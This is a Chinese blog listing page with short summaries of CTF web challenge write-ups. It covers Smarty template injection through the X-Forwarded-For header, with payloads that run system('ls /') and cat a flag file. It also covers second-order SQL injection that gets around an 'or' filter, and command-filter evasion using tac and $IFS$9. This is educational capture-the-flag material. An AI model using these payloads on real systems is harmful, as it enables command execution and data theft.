2022年7月6日
[CISCN2019 华东南赛区]Web11 ssti smarty模板注入 xff
摘要: smarty模板注入是在请求报文里X-Forwarded-For处进行操作的 X-Forwarded-For: {{system("ls /")}} X-Forwarded-For: {{system("cat ../../../../../../../flag")}} 阅读全文
posted @ 2022-07-06 23:30 Galio 阅读(31) 评论(0) 推荐(0) 编辑
[SWPU2019]Web1 二次注入(适用于发表文章后查看文章的逻辑) & 过滤了or的注入方法:不使用information_schema这个内置库 &无列名注入
摘要: 首先,这是一个二次注入,先insert into 到文章表,填字段的时候想着查询语句的结构,填写恶意语句。 输入过滤了or、注释符 or被过滤了,影响很大,第一不能order by 了,得union select慢慢试,最要紧的是information_schema不能用了,这个内置库不能用的话,就 阅读全文
posted @ 2022-07-06 16:05 Galio 阅读(102) 评论(0) 推荐(0) 编辑
[WUSTCTF2020]朴实无华 web三件套&intval()特性&md5()绕过&linux tac替代cat&php$IFS$9替代空格
摘要: 建议前期实行web三件套的时候就开着代理。 看到bot,想到robots.txt,得到: User-agent: * Disallow: /fAke_f1agggg.php 抓包访问,返回包中有一个Look_at_me: /fl4g.php 访问,得到源码: <?php header('Conten 阅读全文
posted @ 2022-07-06 02:17 Galio 阅读(467) 评论(0) 推荐(0) 编辑